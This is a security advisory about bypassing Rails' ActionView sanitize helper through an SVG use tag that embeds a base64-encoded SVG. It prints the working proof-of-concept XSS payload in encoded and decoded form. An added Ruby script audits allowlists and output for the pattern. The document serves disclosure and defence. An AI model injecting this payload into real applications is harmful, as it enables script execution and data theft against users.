Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.


News category: Security vulnerabilities
Source: vulners.com


In the specific configuration, it was possible to bypass HTML sanitization by using the use tag of the SVG element. In the index.html.erb:

```ruby
<%= sanitize "<svg><use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEzMzcnIGhlaWdodD0nMTMzNyc+CjxpbWFnZSBocmVmPSIxIiBvbmVycm9yPSJhbGVydCh3aW5kb3cub3JpZ2luKSIgLz4KPC9zdmc+#x\"/></svg>", tags: %w(svg use) %>
```

The use tag allows embedding another base64-encoded SVG that contains the actual XSS payload. After base64 decoding:

```svg
<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='1337' height='1337'>
<image href="1" onerror="alert(window.origin)" />
</svg>
```

The svg and use tags had to be allowed, either in the global configuration (config.action_view.sanitized_allowed_tags = ['svg', 'use']) or inline through the tags argument of the helper.

Impact

XSS could lead to data theft through the attacker's ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customers'... ...
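The two preconditions the report names are an allowlist containing both svg and use, and a use element whose href smuggles a second SVG as a base64 data: URI. The following is an added example, not code from the report, from vulners.com or from Rails itself: a small Ruby audit a defender can run against the sanitizer configuration and against already-sanitized output. The function names (allows_svg_use?, decode_svg_data_uri, audit_use_data_hrefs) and the sample markup are constructed for this illustration; the inner SVG mirrors the decoded payload shown above.

```ruby
require 'base64'

# Added example (not the report's or Rails' code): defender-side checks for
# the configuration and output pattern described in the report.

# The report states the bypass needs both svg and use to be allowed, either
# globally (config.action_view.sanitized_allowed_tags) or via tags: on the
# helper. Flag any allowlist that contains both.
def allows_svg_use?(allowed_tags)
  allowed = allowed_tags.map { |t| t.to_s.downcase }
  allowed.include?('svg') && allowed.include?('use')
end

# href / xlink:href on a <use> element that carries a data: URI.
USE_DATA_HREF = /<use\b[^>]*?(?:xlink:)?href\s*=\s*["']?(data:[^"'\s>]+)/i

# Decodes a data:image/svg+xml;base64,... URI into the embedded SVG text;
# returns nil for any other kind of URI.
def decode_svg_data_uri(uri)
  m = uri.match(%r{\Adata:image/svg\+xml;base64,([A-Za-z0-9+/=]+)}i)
  m && Base64.decode64(m[1])
end

# Scans sanitized markup for <use> references that embed a whole SVG through
# a data: URI and reports any event-handler attributes (onerror, onload, ...)
# present in the decoded document, i.e. content the outer sanitizer never saw.
def audit_use_data_hrefs(html)
  findings = []
  html.scan(USE_DATA_HREF) do |(uri)|
    inner = decode_svg_data_uri(uri.split('#', 2).first)
    if inner.nil?
      findings << { uri: uri[0, 40], decoded: false, event_handlers: [] }
      next
    end
    handlers = inner.scan(/\bon[a-z]+(?=\s*=)/i).map(&:downcase).uniq
    findings << { uri: uri[0, 40], decoded: true, event_handlers: handlers }
  end
  findings
end

# Constructed samples. INNER_SVG mirrors the decoded payload from the report.
INNER_SVG = <<~SVG
  <svg id='x' xmlns='http://www.w3.org/2000/svg' width='1337' height='1337'>
  <image href="1" onerror="alert(window.origin)" />
  </svg>
SVG

UNSAFE_SAMPLE = "<svg><use href=\"data:image/svg+xml;base64," \
                "#{Base64.strict_encode64(INNER_SVG)}#x\"/></svg>"
SAFE_SAMPLE = '<svg><use href="#icon"/></svg>'

if __FILE__ == $PROGRAM_NAME
  puts "svg+use allowed: #{allows_svg_use?(%w[svg use])}"
  audit_use_data_hrefs(UNSAFE_SAMPLE).each { |f| p f }
  p audit_use_data_hrefs(SAFE_SAMPLE)
end
```

The audit treats a decodable data: SVG on a use element as a finding in its own right, because the sanitizer's allowlist only ever applied to the outer document; the event-handler list just shows what the embedded document carries. The configuration check is the cheaper control: per the report, the bypass does not apply unless svg and use are both on the allowlist.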


